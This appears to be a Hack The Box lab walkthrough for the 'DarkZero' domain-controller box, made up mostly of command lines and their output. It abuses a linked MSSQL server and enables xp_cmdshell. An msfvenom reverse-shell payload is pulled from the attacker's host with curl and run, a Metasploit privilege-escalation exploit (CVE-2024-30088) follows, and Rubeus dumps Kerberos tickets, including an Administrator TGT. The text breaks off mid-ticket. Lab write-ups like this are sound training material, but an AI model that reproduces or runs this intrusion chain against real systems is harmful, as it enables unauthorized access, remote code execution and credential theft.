Nmap
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ nmap -sC -sV -Pn 10.129.202.136 -oN ./nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-05 22:44 UTC
Nmap scan report for 10.129.202.136
Host is up (0.28s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-05 18:46:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ssl-date: 2025-10-05T18:47:47+00:00; -3h58m12s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-05T09:46:08
|_Not valid after: 2055-10-05T09:46:08
| ms-sql-ntlm-info:
| 10.129.202.136:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
| ms-sql-info:
| 10.129.202.136:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-05T18:47:06
|_ start_date: N/A
|_clock-skew: mean: -3h58m14s, deviation: 2s, median: -3h58m15s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.78 seconds
Let's add DNS:DC01.darkzero.htbto our /etc/hosts
We have get the credit of john.w
As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!
SMB
Let's start with SMB service and check what can we visit
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ netexec smb 10.129.202.136 -u john.w -p 'RFulUtONCOL!'
SMB 10.129.202.136 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.202.136 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ netexec smb 10.129.202.136 -u john.w -p 'RFulUtONCOL!' --shares
SMB 10.129.202.136 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.202.136 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.129.202.136 445 DC01 [*] Enumerated shares
SMB 10.129.202.136 445 DC01 Share Permissions Remark
SMB 10.129.202.136 445 DC01 ----- ----------- ------
SMB 10.129.202.136 445 DC01 ADMIN$ Remote Admin
SMB 10.129.202.136 445 DC01 C$ Default share
SMB 10.129.202.136 445 DC01 IPC$ READ Remote IPC
SMB 10.129.202.136 445 DC01 NETLOGON READ Logon server share
SMB 10.129.202.136 445 DC01 SYSVOL READ Logon server share
To be honest I don't find anything interesting here.
But maybe we can continue to enumerate the valid users
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ netexec smb 10.129.202.136 -u john.w -p 'RFulUtONCOL!' --users
SMB 10.129.202.136 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.202.136 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.129.202.136 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.202.136 445 DC01 Administrator 2025-09-10 16:42:44 0 Built-in account for administering the computer/domain
SMB 10.129.202.136 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.202.136 445 DC01 krbtgt 2025-07-29 11:40:16 0 Key Distribution Center Service Account
SMB 10.129.202.136 445 DC01 john.w 2025-07-29 15:33:53 0
SMB 10.129.202.136 445 DC01 [*] Enumerated 4 local users: darkzero
Still not interesting target here.
Mssql
I found this machine open the service of Mssql, this is usually not open to the outside world, but is only used by internal hosts. So maybe that would be our next target.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ mssqlclient.py darkzero.htb/john.w:'RFulUtONCOL!'@dc01.darkzero.htb -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)> EXEC sp_linkedservers;
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
We successfully find another server DC02.darkzero.ext.
Then I would try to use xp_cmdshellto run the command
SQL (darkzero\john.w guest@master)> EXECUTE('EXEC xp_cmdshell ''ping 10.10.14.12''') AT [DC02.darkzero.ext];
ERROR(DC02): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
That means the use of xp_cmdshell is not enabled in config, we need to check and try to enable it.
SQL (darkzero\john.w guest@master)> EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
SQL (darkzero\john.w guest@master)> EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
Now we can run the command successfully
SQL (darkzero\john.w guest@master)> EXEC ('EXEC xp_cmdshell ''whoami'';') AT [DC02.darkzero.ext];
output
--------------------
darkzero-ext\svc_sql
NULL
That means we can try to make a reverse shell and run it
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.12 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 804 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Upload it to the target machine and use msfconsole to handle it
SQL (darkzero\john.w guest@master)> EXEC ('EXEC xp_cmdshell ''curl http://10.10.14.12/shell.exe -o C:\Programdata\shell.exe'';') AT [DC02.darkzero.ext];
SQL (darkzero\john.w guest@master)> EXEC ('EXEC xp_cmdshell ''C:\Programdata\shell.exe'';') AT [DC02.darkzero.ext];
Finally you can get the reverse shell session as darkzero-ext\svc_sql
meterpreter > getuid
Server username: darkzero-ext\svc_sql
meterpreter > shell
Process 3728 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
darkzero-ext\svc_sql
Privilege escalation on darkzero-ext
Let's enumerate the group info and privilege info
C:\Windows\system32>whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQLSERVER Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
To be honest, I did not find anything interesting to help us elevate privileges.
I would try to upload the winPEASx64.exeto help us find the targets.
���������� Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: svc_sql::darkzero-ext:1122334455667788:6528c0e45fcf35af381233d07bb32803:0101000000000000bf4f2ebb2c36dc018c811f2632980027000000000800300030000000000000000000000000300000e6c16eafef473f217bc7c06466fe13e8e9bba38a29a57485ed0d7fba490d7f300a00100000000000000000000000000000000000090000000000000000000000
=================================================================================================
We can crack this password, but I don't think we can use that.This tool could not give me any CVE detail, I have change into post/multi/recon/local_exploit_suggester
meterpreter > sessions -i 1
[*] Session 1 is already interactive.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf post(multi/recon/local_exploit_suggester) > run
[*] 172.16.20.2 - Collecting local exploits for x64/windows...
/usr/share/metasploit-framework/lib/rex/proto/ldap.rb:13: warning: already initialized constant Net::LDAP::WhoamiOid
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/net-ldap-0.20.0/lib/net/ldap.rb:344: warning: previous definition of WhoamiOid was here
[*] 172.16.20.2 - 206 exploit checks are being tried...
[+] 172.16.20.2 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2022_21882_win32k: The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
[+] 172.16.20.2 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2023_28252_clfs_driver: The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30085_cloud_files: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[+] 172.16.20.2 - exploit/windows/local/cve_2024_35250_ks_driver: The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
[+] 172.16.20.2 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 49 / 49
Actually I only recommended to use the latest CVE vulnerabilities. Usually, these machines are required to use the latest and most stable CVE vulnerabilities possible.
After try some of them, I found exploit/windows/local/cve_2024_30088_authz_basepis the stable one to help us elevate privileges.
msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/cve_2024_30088_authz_basep
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/cve_2024_30088_authz_basep) > set SESSION 1
SESSION => 1
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LHOST 10.10.14.12
LHOST => 10.10.14.12
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LPORT 4444
LPORT => 4444
msf exploit(windows/local/cve_2024_30088_authz_basep) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 1768...
Then you can get the reverse shell as administrator
Lateral movement to dc01.darkzero.htb
Run Rubeus on DC02 to begin capturing:
C:\Windows\system32>.\rubeus.exe monitor /interval:10 /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: TGT Monitoring
[*] Monitoring every 10 seconds for new TGTs
[*] 10/5/2025 3:38:55 PM UTC - Found new TGT:
User : svc_sql@DARKZERO.EXT
StartTime : 10/5/2025 7:23:32 AM
EndTime : 10/5/2025 5:23:32 PM
RenewTill : 10/12/2025 7:23:32 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
doIFgDCCBXygAwIBBaEDAgEWooIEhjCCBIJhggR+MIIEeqADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uRVhUo4IEPjCCBDqgAwIBEqEDAgECooIELASCBChhCj99dj34MrCsS3VQQjCymwan4oZsK8aLlQzty4ugdKdSbhcXw+7nkg+gHa1oF0roNb1Llkurx+UEHmUPtmDS4qJvTbY0MAStRNF6AJxmUEcmtEH2yl+iRemdSITVfyivgnP5zXFWPukoQVuEFWxrisksHSdbrpzfW17qPQox4sgEfOCsmd0cHDpwl420PbTK9trfwui1a3oQd5B4H0PCUjGzbCx28326RuM9j9ZoV0aF9FN42EnO3a7l8ZagY94ztBeHVAmoFYTqmNdYUPK9ZRtIVhCvIjZ7wq8K2d2HguTAPT/tck1deM0TlX0pR+SaQzlZf9BSZg2/KXSwE7tFz3A8sGG27W+S0NzzZ5sLO69LHO+7iSnPOVteg2cXstCr4XyfHgUxAUee0bcXWdyk+w2yHkn7qMIPrEZUoAzC1o+YmJaU+e3yYOI5kNyLd62XGQ3IfX05d+dETAWCxCCi8WGVYTnIELEc/whGA8eC5SowqKy3e4puIwuX+nbjVFuWMhInoL6fE18faPVdrv1UYGE5Bb4Gz+jja5vcXYnIn5aTbN32aUz4W4OXP6wBOEY3TT+URtsUeSm5FaCLLF/3rJyQ0Cyv5G7Lk+eYBQSN3ogW14kudn7FZTFGISJZi1XE7qavlO5kZCbEtSek21qVMvipS4EmhbMsmDzd83garY+lt5BSYrvu/Q4uTpg3ykBCBomsDuCDAFI2I2a/u5aOn4C8qAtD1y8CQnGT0E+9zs5vv0eargHvpdgYbOUZkU/10lyx77MTZYc/sFo+hJLh2+c7m2F1B0HpfyPHom640Aw0V5g7BkozkAG/xlsRVCkSvpAzYErNMmQiAGwSFwk8KgaVk1HG2+nAwIQe9Rwge0nvtPl/JteWRVoD8FNIyvpcyxS0LcdyINiRkKL+BzZe843TYpVU+t0d3MgOOmQRGvWQlV2djmI7svocT6ZziEEGFgJE2hjmAZ3PLM8W4L1C4IKDN5k35/yKzRgY6Hjv0YAfXEZo44uNKTNQWqxR6YobmpC7CPTqZwEc/+m33niBu+k606NMnYBOrnIj0WuUzm0xQ/QjnR3JaYaZkDAUHX+YIOV3+MZ+RNDvL/xY75CGVp3LWxJnVOv8SuerfQCtwhtCj71LjQ7Z8Q+0/dClsYvZCuIWFq3z1kNtU7PyT/NhqgSXzojsl6W0f8h+mPJzeyZ0GMNqG6TIki4i6rhWp/BRiuqX/j+/q8NX5JRNuvQ6+lERBLM3rPmT1j6Lmcxpnf6KSzQ8K40wUWtSPS4/YRK1TYjxMP9R6zq+hAKRBZE8xgEJ0Cp+R1d4Tr3azrbrNpyA4VHpYxSWXwGUYQ0PBpQ1foGGcRdEuCkDQrRIeduI62/zfscLIEjMTeNpvUMsAaZxUnrRVzrCJhTTjXy/Du03GIaZoKiFQ6OB5TCB4qADAgEAooHaBIHXfYHUMIHRoIHOMIHLMIHIoCswKaADAgESoSIEIDhnCy2Ozdb4bK/2Y47ZKWXtuOQpivq28ec4bivHk/xSoQ4bDERBUktaRVJPLkVYVKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAEDhAAClERgPMjAyNTEwMDUxNDIzMzJaphEYDzIwMjUxMDA2MDAyMzMyWqcRGA8yMDI1MTAxMjE0MjMzMlqoDhsMREFSS1pFUk8uRVhUqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5FWFQ=
[*] 10/5/2025 3:38:55 PM UTC - Found new TGT:
User : DC02$@DARKZERO.EXT
StartTime : 10/5/2025 8:21:22 AM
EndTime : 10/5/2025 6:21:22 PM
RenewTill : 10/12/2025 8:21:22 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uRVhUo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD5kvC0qbIPJEEzs26qshG03fv9d4t2zqbTM8Cb6Q27QvO4D1l5uq6hLeO5LwHiWRe4w6SQoqLonvstUIZfqaMfeMXQ62jgmf0v68GLuR/oVgWtY3reREWvpyvOak9ckNHFHzd6Jwk+YFSn1hiwuOiKzH7FFga7pG9k7WmLcxXskYv8RaZpTgh0ZV1z8iva9h0jvlfrNycaBquMAabqarLkamFZ9TqwKMRfaP6k0CkdWiI+p4EviXgzuxTKKlLkeHsFHMO7fQbmhm532yxhVGJSVLcs8tsgLVoIgLhWI+LONS8zdtZ0shx0v98tMS/3lfpTpHPDBB1MSgUSTIZTWgI30Mcr9vyXIYFpy5WPyhYkvkfzWmZs5C2OtfyL8lBFgmfGdNaValeUY3FmhKvVJqwjz+T3KmQm1g3fskGLl75JSNppeL/WkrMV7OAd7bDbsmDM92nMI140hd98eyFJdw7VvHaFfZPDaLNR5c5w2v0Il70eV/SDSSjGSSmStshA21Ua1O8lQsSfBzCN4gUt0Lu5gAhdM4q108AffNMkx+1tdF2SoO3e0iTRZfNb/Sxnqn2oygsvVnxAQ4SlMYYrSPzcITeonm6sZCJm6V/VrxWdq89O+WhYLZV/e/F6lqc8TjY39EhjgOK+RfBLw1VkhBgQNa+cZ3U9z2qcg4gf8+oxSYG0zz+4dC55jM51Y+0Gxj17+xYb4hmTE007uQKWxtDiMAzssEWUiLDwekH7NjXlS/7oCZ3UF1Wmb45cpy1bpk90vdZGX9OGdtjh28P+EHy1l3V5EfWaBDR8Olvn/bB56eNTxxaauAPXQ3p2CqqkzCp8zUea0MSbOeIxh6nULb+7r3ZCjqNNG1qINP/m/e3GS30fc9HJr5UfOWbkwi7fwcvwEWLGoZS03XbRiS8ttV2HZes2guXyjtbTL9tJdzAjJk8CR3OCbHWa7W/g/hx2NO6Q1//9vo6YNQN4zneku2hX4NezLukElDBVAZ2qKyQwftUCP3+m3ve6/94ttTbdAVVtdCgZrBDZ6xbi0/YAnOpAyYabhjCIya88UeE8QmA68yWrcKecHxxiTN9U/RdNdaigvGgome/NgDbTfduOjRO0DTcrIkeqVrWdiPFojAFKn29RtMK5/BDFmCBx/mzmzzwh6/oJO5WvmKm7ZKFIIkVj0G/8WJrhqy8FEmZPpH4oYXNbt5MAcpENqbG3Um+Bu/UcEU2pI8W3FllMFzShRWtUWDa5TaR6xLr5PMXJZ8d7uggRtAyQC8GpnSdh8QARc2NPicD4dDxI6VuLXxl6Hdr6u9v8+FeoH71CZY7+1slUur4y3OwG243+MdWBxWTfrr3zztOGhyBB0lZeLOVh311KtGDYsaAhrhUxmuzhA5zWrElwp1wRbWgS551AmknR1LMBD5NLNnjZm4RxC96JPlUZLg0nHVEQ0DCrNqddowuCjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCD0EeMGxrmy4of4TaFrVrekaloJtgSK+LH8dexweLBlsKEOGwxEQVJLWkVSTy5FWFSiEjAQoAMCAQGhCTAHGwVEQzAyJKMHAwUAQOEAAKURGA8yMDI1MTAwNTE1MjEyMlqmERgPMjAyNTEwMDYwMTIxMjJapxEYDzIwMjUxMDEyMTUyMTIyWqgOGwxEQVJLWkVSTy5FWFSpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDERBUktaRVJPLkVYVA==
[*] 10/5/2025 3:38:55 PM UTC - Found new TGT:
User : Administrator@DARKZERO.EXT
StartTime : 10/5/2025 8:35:20 AM
EndTime : 10/5/2025 6:35:20 PM
RenewTill : 10/12/2025 8:35:20 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
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
[*] 10/5/2025 3:38:55 PM UTC - Found new TGT:
User : DC02$@DARKZERO.EXT
StartTime : 10/5/2025 7:21:54 AM
EndTime : 10/5/2025 5:21:54 PM
RenewTill : 10/12/2025 7:21:54 AM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uRVhUo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD7bc1xE3HGAv27ixrkzQ7y2cC+lEVVIwtjiT3mJPHq+Ec+gjL3RiQLcXk0kqctgCdFzmRYhIDGOeYTZhi9IeP/DwcjSt9/At9CiTxoHZbh8x4orpqPaxEDC6yIzDpAWdhWaYUCUQ/C/81SXi4jCxahbRD54kT7T0J5b8Qm8PEI2tXre7z+lMfzxJzi0PwPUnorfFQ7MvaaEQB4YGCWzo0qWYhwR0t135su1aLY08OMMuFptLM0syV3JFXUqWW2eTxtAArpaxII9d/O6N4nOAC2HbFglaY3j/obldkhOWZwIyFrDmbui8yj5h6QtlKnP/n4Grqzor4+x9fMa6K3mOeOHeI8ghFeOkDGPdJZmRUrQSHuSpuGj4gKx2iwhMCfeKXzTdxPzNFztD0WWy9oYGjrdzHCx83FZPKe1Jdj0pycg2/fYfDfd9RgPqAkwm3EUPo4V/ePPCApQwPUr4ssp9H5HrZMVKwsGg6R5W6NQfm4esirLEUKSAI/oOexQUD4yUaAW2DHNnhOkNjDa9kx3M0L2EMGZyz/NVhM+G3PpaDcsUn0UuEwIlCS1XwHceXf58C5stTqL6wRYIlalCOECkAWnnFieHSAEOrC3eg/nZ6YG3/N3eephlBSkf6sc4YhsBOtVBqcc+FqKEtzGuMPaQzGcsOSgjKgID1MGi1T7C4OKy/YNc/TCz0+5Dw5SasjO8zCOQWi5pHmF32IFiTP2t44Dus6QU90KbRCUVK+X6+rLhsBdz8Iz9rhlrpib/OfdvEF0jIvUiZ8icX9iUuO069Mow4cOp+fEe9ONBAR9jKfqKhvu476AtN8wuqK+ODTgaTTAGNrZGmOo1XRteXZL8ZbeCRIlk4HEXRu2Ix7eZ6Iwl7whNjbBHONQv0vFYV88+rZrwrIbQeG2DTXOaA3Fb56xLFE0M1cz1nfPy6R4ORiAQxTgzSh9sBYD7FQ/X3az+Tsq8tR/5wO+hDmTjgLG0jWuiuITZDZlFVJzbYy1IvRV39EEkmE9vqJILH4smCzpMA+Kz+8zNldTxCANxpue/5VIVL18+Izr3oC+mMGb5QEdZA+62AdzrJOShpzAgq76JRXvXOF4dc